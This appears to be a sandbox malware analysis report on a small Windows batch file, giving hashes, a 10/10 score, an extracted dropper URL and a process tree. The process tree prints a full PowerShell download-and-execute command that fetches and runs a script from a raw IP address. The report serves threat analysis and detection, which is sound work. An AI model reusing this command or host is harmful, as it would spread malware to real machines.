Analysis
-
max time kernel
114s -
max time network
117s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
05-03-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
2fUqd8gw.bat
Resource
win7v200217
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
2fUqd8gw.bat
Resource
win10v200217
windows10_x64
0 signatures
0 seconds
General
-
Target
2fUqd8gw.bat
-
Size
197B
-
MD5
bba13ab064fd650d7da536895d139ddf
-
SHA1
9a69c367fd1c5d3447045ab97f18bd1a7090207d
-
SHA256
3f7d93a5de4e099d800fe9f59e6a3b4bae526e405962e2f0208e18bc1b5cff91
-
SHA512
c9b129829953df9ed8e0a9834fc8bafc0259abe65dc7b185535a8550088d459cd25327b17035405c8b424a263df337cc1bd7ea03b13b4bf95b8a948051efc031
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/2fUqd8gw
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3516 3924 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3516 WerFault.exe Token: SeBackupPrivilege 3516 WerFault.exe Token: SeDebugPrivilege 3516 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe 3516 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2fUqd8gw.bat"1⤵PID:3896
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2fUqd8gw');Invoke-XUBOTSIATLEGFH;Start-Sleep -s 10000"2⤵PID:3924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3516